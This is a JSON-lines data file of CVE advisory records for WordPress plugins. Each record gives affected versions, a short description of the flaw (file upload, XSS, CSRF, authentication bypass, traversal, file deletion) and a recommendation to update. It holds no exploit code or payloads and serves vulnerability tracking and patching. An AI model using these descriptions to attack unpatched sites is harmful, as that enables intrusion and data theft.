{"CVE_ID":"CVE-2025-5012","slug":"workreap","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Workreap plugin for WordPress, used by the Workreap - Freelance Marketplace WordPress Theme, is vulnerable to arbitrary file uploads due to missing file type validation in the 'workreap_temp_upload_to_media' function in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-3-06-june-2025\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-3-06-june-2025\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/185371b1-5c72-424d-a5b8-42c67aa9380c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/185371b1-5c72-424d-a5b8-42c67aa9380c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12875","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.2 via the file download functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/process-download.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/process-download.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec065da7-b8aa-414d-9673-5caf87ad45b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec065da7-b8aa-414d-9673-5caf87ad45b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6692","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 Sell Digital Files & Subscriptions (eCommerce Store + Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Agreement Text value in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54d5ab2-40ba-4ad8-9a77-44aba37f0283?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54d5ab2-40ba-4ad8-9a77-44aba37f0283?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/checkout\\\/template.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/includes\\\/checkout\\\/template.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6691","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 Sell Digital Files & Subscriptions (eCommerce Store + Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the currency value in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0459a6bd-334d-43b7-b289-271108564a53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0459a6bd-334d-43b7-b289-271108564a53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/src\\\/Admin\\\/Settings\\\/Sanitize.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131805\\\/easy-digital-downloads\\\/tags\\\/3.3.3\\\/src\\\/Admin\\\/Settings\\\/Sanitize.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47238","slug":"top-10","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in WebberZone Top 10 \u2013 WordPress Popular posts by WebberZone plugin <=\u00a03.3.2 versions.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13517","slug":"easy-digital-downloads","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title value in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131805%40easy-digital-downloads&new=3131805%40easy-digital-downloads&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3131805%40easy-digital-downloads&new=3131805%40easy-digital-downloads&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d745937-4b0a-480a-9771-8af3288ee98f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d745937-4b0a-480a-9771-8af3288ee98f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13792","slug":"woo-exfood","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The WooCommerce Food - Restaurant Menu & Food ordering plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-food-restaurant-menu-food-ordering\\\/25457330\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-food-restaurant-menu-food-ordering\\\/25457330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec425326-2729-4142-b5f4-460dfd3ed773?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec425326-2729-4142-b5f4-460dfd3ed773?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4252","slug":"eventprime-event-calendar-management","versionImpact":"3.3.2","versionEndExcluding":"3.3.3","description":"The EventPrime WordPress plugin through 3.2.9 specifies the price of a booking in the client request, allowing an attacker to purchase bookings without payment.","recommendation":"Update to version 3.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2019e59-db6c-4014-8057-0644c9a00665\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2019e59-db6c-4014-8057-0644c9a00665\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51688","slug":"ecommerce-product-catalog","versionEndExcluding":"3.3.27","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress.This issue affects eCommerce Product Catalog Plugin for WordPress: from n\/a through 3.3.26.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47839","slug":"ecommerce-product-catalog","versionImpact":"3.3.26","versionEndExcluding":"3.3.27","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress plugin <=\u00a03.3.26 versions.","recommendation":"Update to version 3.3.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ecommerce-product-catalog\\\/wordpress-ecommerce-product-catalog-plugin-for-wordpress-plugin-3-3-26-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5979","slug":"ecommerce-product-catalog","versionEndExcluding":"3.3.26","description":"The eCommerce Product Catalog Plugin for WordPress plugin before 3.3.26 does not have CSRF checks in some of its admin pages, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks, such as delete all products","recommendation":"Update to version 3.3.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936934c3-5bfe-416e-b6aa-47bed4db05c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936934c3-5bfe-416e-b6aa-47bed4db05c4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5973","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.3.23","versionEndExcluding":"3.3.24","description":"The MasterStudy LMS WordPress Plugin  WordPress plugin before 3.3.24 does not prevent students from creating instructor accounts, which could be used to get access to functionalities they shouldn't have.","recommendation":"Update to version 3.3.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59abfb7c-d5ea-45f2-ab9a-4391978e3805\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59abfb7c-d5ea-45f2-ab9a-4391978e3805\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4973","slug":"workreap","versionImpact":"3.3.1","versionEndExcluding":"3.3.2","description":"The Workreap plugin for WordPress, used by the Workreap - Freelance Marketplace WordPress Theme, is vulnerable to authentication bypass in all versions up to, and including, 3.3.1. This is due to the plugin not properly verifying a user's identity prior to logging them in when verifying an account with an email address. This makes it possible for unauthenticated attackers to log in as registered users, including administrators, if they know user's email address. This is only exploitable fi the user's confirmation_key has not already been set by the plugin.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-2-23-may-2025\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/workreap-freelance-marketplace-wordpress-theme\\\/23712454#item-description__release-3-3-2-23-may-2025\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e7693a3-642a-4eff-902c-d29a3c12deb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e7693a3-642a-4eff-902c-d29a3c12deb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0688","slug":"metform","versionEndExcluding":"3.3.2","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_thankyou' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about form submissions, including payment status, and transaction ID.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81fc41a4-9206-404c-bd5b-821c77ff3593?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81fc41a4-9206-404c-bd5b-821c77ff3593?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9685","slug":"notification-for-telegram","versionImpact":"3.3.1","versionEndExcluding":"3.3.2","description":"The Notification for Telegram plugin for WordPress is vulnerable to unauthorized test message sending due to a missing capability check on the 'nftb_test_action' function in versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to send a test message via the Telegram Bot API to all users configured in the settings.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abaebd3b-69ab-4e9b-a528-c9d846e62238?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abaebd3b-69ab-4e9b-a528-c9d846e62238?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notification-for-telegram\\\/tags\\\/3.3\\\/index.php#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notification-for-telegram\\\/tags\\\/3.3\\\/index.php#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165615\\\/notification-for-telegram\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165615\\\/notification-for-telegram\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7050","slug":"use-your-drive","versionImpact":"3.3.1","versionEndExcluding":"3.3.2","description":"The Use-your-Drive | Google Drive plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in file metadata in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can be exploited by the lowest authentication level permitted to upload files, including unauthenticated users, once a file upload shortcode is published on a publicly accessible post.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpcloudplugins.gitbook.io\\\/docs\\\/other\\\/changelog\",\"name\":\"https:\\\/\\\/wpcloudplugins.gitbook.io\\\/docs\\\/other\\\/changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de0c8922-b290-4582-9079-e79da684bcff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de0c8922-b290-4582-9079-e79da684bcff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13658","slug":"ngg-smart-image-search","versionImpact":"3.2.1","versionEndExcluding":"3.3.2","description":"The NGG Smart Image Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hr_SIS_nextgen_searchbox' shortcode in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233519%40ngg-smart-image-search&new=3233519%40ngg-smart-image-search&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233519%40ngg-smart-image-search&new=3233519%40ngg-smart-image-search&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d916e320-e78b-4305-a4da-10c6fb8db41a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d916e320-e78b-4305-a4da-10c6fb8db41a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4367","slug":"download-manager","versionImpact":"3.3.18","versionEndExcluding":"3.3.19","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpdm_user_dashboard shortcode in all versions up to, and including, 3.3.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/User\\\/views\\\/dashboard\\\/profile.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/wpdm-functions.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3313608%40download-manager&old=3308801%40download-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3313608%40download-manager&old=3308801%40download-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/029956d7-6e3f-4159-9f53-05691e0262fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/029956d7-6e3f-4159-9f53-05691e0262fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1596","slug":"ninja-forms-uploads","versionImpact":"3.3.16","versionEndExcluding":"3.3.18","description":"The Ninja Forms - File Uploads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an uploaded file (e.g. RTX file) in all versions up to, and including, 3.3.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/499a1892-12b7-49d5-b65f-4f53a968a23a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/499a1892-12b7-49d5-b65f-4f53a968a23a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/?changelog=1\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/file-uploads\\\/?changelog=1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5234","slug":"woo-related-products-refresh-on-reload","versionImpact":"3.3.15","versionEndExcluding":"3.3.16","description":"The Related Products for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'woo-related' shortcode in versions up to, and including, 3.3.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98498b8-9397-42e9-9c99-a576975c9ac9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98498b8-9397-42e9-9c99-a576975c9ac9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-related-products-refresh-on-reload\\\/tags\\\/3.3.15\\\/woo-related-products.php#L303\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-related-products-refresh-on-reload\\\/tags\\\/3.3.15\\\/woo-related-products.php#L303\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988185\\\/woo-related-products-refresh-on-reload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988185\\\/woo-related-products-refresh-on-reload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3404","slug":"download-manager","versionImpact":"3.3.12","versionEndExcluding":"3.3.13","description":"The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the savePackage function in all versions up to, and including, 3.3.12. This makes it possible for authenticated attackers, with Author-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.12\\\/src\\\/Admin\\\/Menu\\\/Packages.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8f5be-b513-4040-af39-c1a61d7e313f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8f5be-b513-4040-af39-c1a61d7e313f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7624","slug":"zephyr-project-manager","versionImpact":"3.3.101","versionEndExcluding":"3.3.102","description":"The Zephyr Project Manager plugin for WordPress is vulnerable to limited privilege escalation in all versions up to, and including, 3.3.101. This is due to the plugin not properly checking a users capabilities before allowing them to enable access to the plugin's settings through the update_user_access() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to grant themselves full access to the plugin's settings.","recommendation":"Update to version 3.3.102, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ef344d-cd56-43f9-b185-de83a92800de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9ef344d-cd56-43f9-b185-de83a92800de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/includes\\\/Base\\\/AjaxHandler.php?rev=3111536#L2464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/includes\\\/Base\\\/AjaxHandler.php?rev=3111536#L2464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134404\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134404\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11452","slug":"chamber-dashboard-business-directory","versionImpact":"3.3.8","versionEndExcluding":"3.3.10","description":"The Chamber Dashboard Business Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'business_categories' shortcode in all versions up to, and including, 3.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chamber-dashboard-business-directory\\\/trunk\\\/shortcodes\\\/bus_cat_shortcode.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chamber-dashboard-business-directory\\\/trunk\\\/shortcodes\\\/bus_cat_shortcode.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222548\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222548\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e5989f-3d2c-4ed3-b4c4-f2589b885637?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e5989f-3d2c-4ed3-b4c4-f2589b885637?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5614","slug":"theme-switcha","versionImpact":"3.3","versionEndExcluding":"3.3.1","description":"The Theme Switcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'theme_switcha_list' shortcode in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.1, or a newer patched 